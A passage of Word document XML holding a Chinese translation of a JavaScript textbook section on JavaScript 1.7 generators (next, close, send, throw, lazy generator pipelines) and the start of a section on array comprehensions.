      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用生成器函数以获得一个生成器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f=fibonacci();//</w:t>
      </w:r>
      <w:r>
        <w:t>将生成器当做迭代器，输出</w:t>
      </w:r>
      <w:r>
        <w:t>Fibonacci</w:t>
      </w:r>
      <w:r>
        <w:t>数列的前</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(let </w:t>
      </w:r>
      <w:r>
        <w:t>i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++)console.log(f.next());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们注意到，</w:t>
      </w:r>
      <w:r>
        <w:t>fibonacci()</w:t>
      </w:r>
      <w:r>
        <w:t>生成器函数没有返回。因此，它所产生的生成器不会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>。不能把这个生成器当做一个可迭代的对象用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环进行遍历，这个循环是一个无穷循环，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>而是把它当做一个迭代器并显式调用</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>次它的</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来实现。这段代码运行后，生成器</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>依然保持着生成器函数的执行状态。如果不再使用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>f.close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来释放它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当调用了生成器的</w:t>
      </w:r>
      <w:r>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，和它相关的生成器函数就会终止执行，就像在函数运行挂起的位置执行一条</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句。如果当前挂起位置在一个或者多个</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句块中，那么将首先运行</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句，再执行</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>返回。</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>没有返回值，但如果</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句块产生了异常，这个异常则会传播给</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>生成器经常用来处理序列化的数据，比如元素列表、多行文本、词法分析器中的单词等。生成器可以像</w:t>
      </w:r>
      <w:r>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>命令中的管道那样链式使用。有趣的是，这种用法中的生成器是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>懒惰的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，只有在需要的时候才会从生成器（或</w:t>
      </w:r>
      <w:r>
        <w:t>者生成器的管道）中</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>取</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>值，而不是一次将许多结果都计算出来。参照例</w:t>
      </w:r>
      <w:r>
        <w:t>11-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>11-1</w:t>
      </w:r>
      <w:r>
        <w:t>：一个生成器管道</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个生成器，每次产生一行字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>s.split()</w:t>
      </w:r>
      <w:r>
        <w:t>，因为这样会每次都处理整个字串，并分配一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们希望能更</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>懒</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>一些</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function eachline(s){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let p;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while((p=s.indexOf('\n'))!=-1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>yield s.substring(0,p);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s=s.substring(p+1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(s.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0)yield </w:t>
      </w:r>
      <w:r>
        <w:t>s;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个生成器函数，对于每个可迭代的</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的每个元素</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，都会产生一个</w:t>
      </w:r>
      <w:r>
        <w:t>f(x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function map(i,f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let x in i)yield f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个生成器函数，针对每个结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>f(x)</w:t>
      </w:r>
      <w:r>
        <w:t>，为</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>生成一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function select(i,f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let x in i){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(f(x))yield x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>准备处理这个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">let text="#comment\n\n hello\nworld\n quit\n </w:t>
      </w:r>
      <w:r>
        <w:t>unreached\n";//</w:t>
      </w:r>
      <w:r>
        <w:t>现在创建一个生成器管道来处理它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先，将文本分隔成行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let lines=eachline(text);//</w:t>
      </w:r>
      <w:r>
        <w:t>然后，去掉行首和行尾的空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let trimmed=map(lines,function(line){return line.trim();});//</w:t>
      </w:r>
      <w:r>
        <w:t>最后，忽略空行和注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let nonblank=select(trimmed,function(line){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return line.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>line[0]!="#"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>现在从管道中取出经过删减和筛选</w:t>
      </w:r>
      <w:r>
        <w:t>后的行对其进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>直到遇到</w:t>
      </w:r>
      <w:r>
        <w:t>"quit"</w:t>
      </w:r>
      <w:r>
        <w:t>的行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let line in nonblank){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(line==="quit")break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(line);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生成器往往是在创建的时候初始化，传入生成器函数的值是生成器所接收的唯一输入。然而，也可以为正在执行的生成器提供更多输入。每一个生成器都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，后者用来重启生成器</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的执行，就像</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样。和</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>不同的是，</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>可以带一个参数，这个参数的值就成为</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>表达式的值（多数生成器函数</w:t>
      </w:r>
      <w:r>
        <w:t>是不会接收额外的输入的，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>看起来像一条语句。但实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>是一个表达式，是可以有值的）。除了</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>之外，还有一种方法可以重启生成器的执行，即使用</w:t>
      </w:r>
      <w:r>
        <w:t>throw()</w:t>
      </w:r>
      <w:r>
        <w:t>。如果调用这个方法，</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>表达式就将参数作为一个异常抛给</w:t>
      </w:r>
      <w:r>
        <w:t>throw()</w:t>
      </w:r>
      <w:r>
        <w:t>，比如，下面一段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个生成器函数，用以从某个初始值开始计数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用生成器的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>来进行增量计算</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用生成器的</w:t>
      </w:r>
      <w:r>
        <w:t>throw("reset")</w:t>
      </w:r>
      <w:r>
        <w:t>来重置初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的代码只是示例，</w:t>
      </w:r>
      <w:r>
        <w:t>throw()</w:t>
      </w:r>
      <w:r>
        <w:t>的这种用法并不推荐</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:t>tion counter(initial){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let nextValue=initial;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(true){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let increment=yield nextValue;//</w:t>
      </w:r>
      <w:r>
        <w:t>产生一个值并得到增量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(increment)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果我们传入一个增量</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>nextValue+=increment;//……</w:t>
      </w:r>
      <w:r>
        <w:t>那么使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else nextValue++;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则自增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果调用了生成器的</w:t>
      </w:r>
      <w:r>
        <w:t>throw()</w:t>
      </w:r>
      <w:r>
        <w:t>，则执行这里的逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e==="reset")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>nextValue=initial;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw 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let c=counter(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>来创建生成器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(c.next());//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(c.send(2));//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(c.throw("reset"));//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="288" w:name="11_4_4_Shu_Zu_Tui_Dao_"/>
      <w:r>
        <w:t>11.4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组推导</w:t>
      </w:r>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>中的数组推导（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">array </w:t>
      </w:r>
      <w:r>
        <w:t>comprehension</w:t>
      </w:r>
      <w:r>
        <w:t>）也是从</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>中借用过来的一个概念。它是一种利用另外一个数组或可迭代对象来初始化数组元素的技术。数组推导的语法是基于定义元素集合的数学模型的，也就是说，表达式和从句的写法和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员期望的不一致。但不必担心，因为花不了太多时间就可以掌握这种新式语法，一旦掌握它则威力无穷。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面这段代码展示了数组推导的写法，这里用到了上文定义的</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这段代码用以初始化一个数组，数组成员是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>之间的偶平方数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let evensquares=[x*x for</w:t>
      </w:r>
      <w:r>
        <w:t>(x in range(0,10))if(x%2===0)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码和下面这五行代码等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let evensquares=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(x in range(0,10)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x%2===0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>evensquares.push(x*x);</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一般来讲，数组推导的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
